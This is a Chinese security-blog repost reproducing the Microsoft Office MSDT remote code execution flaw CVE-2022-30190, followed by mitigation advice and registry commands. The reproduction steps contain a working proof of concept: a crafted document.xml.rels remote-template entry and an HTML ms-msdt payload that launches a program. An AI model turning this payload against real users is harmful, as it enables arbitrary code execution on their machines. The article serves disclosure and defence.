Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

admin 2025年1月16日23:46:01评论23 views字数 1940阅读6分28秒阅读模式
Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

0x01 Microsoft Office

Microsoft Office是由Microsoft(微软)公司开发的一套办公软件套装。常用组件有 Word、Excel、PowerPoint等。

0x02 漏洞简介

该文档使用 Word 远程模板功能从远程网络服务器检索 HTML 文件,该服务器使用 ms-msdt MSProtocol URI 方案加载代码并执行 PowerShell,禁用宏,仍能通过MSDT功能执行代码(恶意 Word 文档通常用于通过宏执行代码)。Microsoft Defender 当前无法阻止执行。受保护的视图启动无需打开文档即可运行。

0x03 漏洞复现

步骤:

1、 新建一个word 文档,在里面随便输入东西

2、 将 word 文档后缀更改为 zip

3、 将 zip 包解压打开,编辑文件夹下的 word 目录下的_rels 下的document.xml.rels

4 、 按照格式加入

<Relationship  Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObje ct" Target="mhtml:http://localhost:80/exploit.html!x-usc:http://localhost:80/exploit.html" TargetMode="External"/>
Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

5、 然后将文件夹打包成 zip,再改后缀为docx

6、 建一个文件夹作为web 站点目录,新建html 文件添加

<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=?IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(\\localhost\c$\windows\system32\calc)/.exe"";</script>
Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

7、 在该web站点目录下用python运行http.server服务

8、 点开改好后的word 文档即可

Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

参照代码逻辑复现没发现什么问题,在对word 文档操作后,打开的word 文档不能调用远程模板,而用代码生成的word 文档可以调用,所以在最后一步利用了代码生成的 poc 文档,成功将其复现。

Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

0x04 漏洞评定

  • 公开程度:已发现在野利用

  • 利用条件:需要打开或点击特定文件

  • 漏洞危害:高危 任意代码执行

0x05 修复方案

官方修复方案:

目前微软暂未针对此漏洞发布安全补丁,提供了临时修复措施进行防护:

禁用MSDT URL协议

1、以管理员身份运行命令提示符。

2、备份注册表项后,执行命令

reg export HKEY_CLASSES_ROOTms-msdt filename

3、再执行命令

reg delete HKEY_CLASSES_ROOTms-msdt /f

撤销该禁用:

1、以管理员身份运行命令提示符。

2、备份注册表项后,执行命令

reg import filename

官方参考链接:

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

Microsoft Defender在1.367.719.0及以上版本支持此漏洞的检测和防护,Microsoft Defender for Endpoint 已为用户提供检测和警报;Microsoft365 Defender门户中的以下警报标题可以提示网络上的威胁活动:Office 应用程序的可疑行为、Msdt.exe 的可疑行为。

其他修复方案:

1、关闭资源管理器的预览窗格,不轻易打开陌生链接或下载来历不明的文档;

2、如果您使用Microsoft Defender的 Attack Surface Reduction(ASR)规则,则可在Block模式下激活“阻止所有Office应用程序创建子进程”规则。若您还没有使用ASR规则,可先在Audit模式下运行规则,观察结果以确保不会对系统造成不利影响;

3、通过创建ASL规则防止Office产生子进程:

【知识星球介绍】

一次付费 永久免费,到期联系运营即可免费加入】

星球面向群体:主要面向信息安全研究人员.

更新周期:最晚每两天更新一次.

内容方向:原创安全工具安全开发WEB安全内网渗透Bypass代码审计CTF免杀思路技巧实战分享最新漏洞安全资讯

Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

原文始发于微信公众号(寻云安全团队):【漏洞复现】Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月16日23:46:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Microsoft Office MSDT 远程代码执行漏洞 (CVE-2022-30190)https://cn-sec.com/archives/1079273.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息